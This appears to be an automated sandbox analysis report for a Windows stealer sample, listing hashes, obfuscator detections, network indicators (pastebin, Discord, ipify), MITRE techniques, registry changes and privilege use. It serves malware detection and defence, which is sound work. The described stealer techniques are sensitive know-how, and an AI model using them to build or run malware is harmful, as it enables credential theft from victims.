1b2fb2ee078cbe3782e0cf1b4ff7eb3188e45005ac3ebbd127a4b8678f7bd640

Analysis

max time kernel
175s
max time network
175s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-12-2024 06:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

InfectedStealer.exe
Size

4.3MB
MD5

3af4ffcfa2426836921b002f88c01b26
SHA1

9597bd7e519ef238c72416bd4d4945dc6fa1e05b
SHA256

d468d59ea330e48277fa1dd62eccb8d05b324eacb78b8bd1e54df0c9fb83d8f9
SHA512

6ebccd91ef6af4ff8b896a45a3c16aa28a8e8fb737a598e856441b6c9e59f8c6aa4af05d3abea279566b8a1196d1f05cac25661b78f3c50cde981790c8bf0a29
SSDEEP

98304:PkjozJ9/im8XVBKl6tmJVPS47x/EaR5zNNHtFWIT4bNJFY3OqttIFe:XzJpjS346tmJ1xsG53tFWjBHYdIw

Score

7^/10

agilenet discovery

Malware Config

Signatures

Obfuscated with Agile.Net obfuscator 8 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral2/memory/1912-5-0x0000000009240000-0x0000000009260000-memory.dmp	agile_net
behavioral2/memory/1912-7-0x0000000009BF0000-0x0000000009C10000-memory.dmp	agile_net
behavioral2/memory/1912-9-0x000000000A0C0000-0x000000000A12E000-memory.dmp	agile_net
behavioral2/memory/1912-13-0x000000000A1D0000-0x000000000A1EE000-memory.dmp	agile_net
behavioral2/memory/1912-12-0x000000000A1C0000-0x000000000A1D0000-memory.dmp	agile_net
behavioral2/memory/1912-10-0x000000000A130000-0x000000000A13E000-memory.dmp	agile_net
behavioral2/memory/1912-11-0x000000000A150000-0x000000000A1AA000-memory.dmp	agile_net
behavioral2/memory/1912-14-0x000000000AEE0000-0x000000000B02A000-memory.dmp	agile_net

Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs

Web Service

T1102

flow	ioc
9	pastebin.com
70	discord.com
72	discord.com
74	pastebin.com
4	pastebin.com
8	pastebin.com
71	discord.com
82	discord.com
83	discord.com
90	pastebin.com
6	pastebin.com
7	pastebin.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
75	api.ipify.org
76	api.ipify.org
91	api.ipify.org

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InfectedStealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	InfectedStealer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	InfectedStealer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	InfectedStealer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = ffffffff	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	InfectedStealer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257"	InfectedStealer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4089630652-1596403869-279772308-1000\{CE04E743-8DE7-4C93-AC5C-E1A84376464F}	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Pictures"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000022ad5a689918db017f830872a318db013f480d72a318db0114000000	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 7e003100000000004759615311004465736b746f7000680009000400efbe4759e549955972372e00000065e101000000010000000000000000003e0000000000757f03004400650073006b0074006f007000000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370036003900000016000000	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96"	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1"	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0"	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	InfectedStealer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	InfectedStealer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "1"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 500031000000000047590654100041646d696e003c0009000400efbe4759e549955965372e0000005be101000000010000000000000000000000000000006d982b00410064006d0069006e00000014000000	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000004759e5491100557365727300640009000400efbe874f7748955965372e000000c70500000000010000000000000000003a000000000027162a0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	InfectedStealer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1"	InfectedStealer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0"	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff	InfectedStealer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	InfectedStealer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	InfectedStealer.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	InfectedStealer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1912	InfectedStealer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	InfectedStealer.exe
Token: SeIncreaseQuotaPrivilege	708	wmic.exe
Token: SeSecurityPrivilege	708	wmic.exe
Token: SeTakeOwnershipPrivilege	708	wmic.exe
Token: SeLoadDriverPrivilege	708	wmic.exe
Token: SeSystemProfilePrivilege	708	wmic.exe
Token: SeSystemtimePrivilege	708	wmic.exe
Token: SeProfSingleProcessPrivilege	708	wmic.exe
Token: SeIncBasePriorityPrivilege	708	wmic.exe
Token: SeCreatePagefilePrivilege	708	wmic.exe
Token: SeBackupPrivilege	708	wmic.exe
Token: SeRestorePrivilege	708	wmic.exe
Token: SeShutdownPrivilege	708	wmic.exe
Token: SeDebugPrivilege	708	wmic.exe
Token: SeSystemEnvironmentPrivilege	708	wmic.exe
Token: SeRemoteShutdownPrivilege	708	wmic.exe
Token: SeUndockPrivilege	708	wmic.exe
Token: SeManageVolumePrivilege	708	wmic.exe
Token: 33	708	wmic.exe
Token: 34	708	wmic.exe
Token: 35	708	wmic.exe
Token: 36	708	wmic.exe
Token: SeIncreaseQuotaPrivilege	708	wmic.exe
Token: SeSecurityPrivilege	708	wmic.exe
Token: SeTakeOwnershipPrivilege	708	wmic.exe
Token: SeLoadDriverPrivilege	708	wmic.exe
Token: SeSystemProfilePrivilege	708	wmic.exe
Token: SeSystemtimePrivilege	708	wmic.exe
Token: SeProfSingleProcessPrivilege	708	wmic.exe
Token: SeIncBasePriorityPrivilege	708	wmic.exe
Token: SeCreatePagefilePrivilege	708	wmic.exe
Token: SeBackupPrivilege	708	wmic.exe
Token: SeRestorePrivilege	708	wmic.exe
Token: SeShutdownPrivilege	708	wmic.exe
Token: SeDebugPrivilege	708	wmic.exe
Token: SeSystemEnvironmentPrivilege	708	wmic.exe
Token: SeRemoteShutdownPrivilege	708	wmic.exe
Token: SeUndockPrivilege	708	wmic.exe
Token: SeManageVolumePrivilege	708	wmic.exe
Token: 33	708	wmic.exe
Token: 34	708	wmic.exe
Token: 35	708	wmic.exe
Token: 36	708	wmic.exe
Token: SeIncreaseQuotaPrivilege	4764	wmic.exe
Token: SeSecurityPrivilege	4764	wmic.exe
Token: SeTakeOwnershipPrivilege	4764	wmic.exe
Token: SeLoadDriverPrivilege	4764	wmic.exe
Token: SeSystemProfilePrivilege	4764	wmic.exe
Token: SeSystemtimePrivilege	4764	wmic.exe
Token: SeProfSingleProcessPrivilege	4764	wmic.exe
Token: SeIncBasePriorityPrivilege	4764	wmic.exe
Token: SeCreatePagefilePrivilege	4764	wmic.exe
Token: SeBackupPrivilege	4764	wmic.exe
Token: SeRestorePrivilege	4764	wmic.exe
Token: SeShutdownPrivilege	4764	wmic.exe
Token: SeDebugPrivilege	4764	wmic.exe
Token: SeSystemEnvironmentPrivilege	4764	wmic.exe
Token: SeRemoteShutdownPrivilege	4764	wmic.exe
Token: SeUndockPrivilege	4764	wmic.exe
Token: SeManageVolumePrivilege	4764	wmic.exe
Token: 33	4764	wmic.exe
Token: 34	4764	wmic.exe
Token: 35	4764	wmic.exe
Token: 36	4764	wmic.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
1912	InfectedStealer.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe
2064	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1912	InfectedStealer.exe
1912	InfectedStealer.exe
1912	InfectedStealer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2064 wrote to memory of 4760	2064	msedge.exe	92
PID 2064 wrote to memory of 4760	2064	msedge.exe	92
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4000	2064	msedge.exe	93
PID 2064 wrote to memory of 4396	2064	msedge.exe	94
PID 2064 wrote to memory of 4396	2064	msedge.exe	94
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
PID 2064 wrote to memory of 624	2064	msedge.exe	95
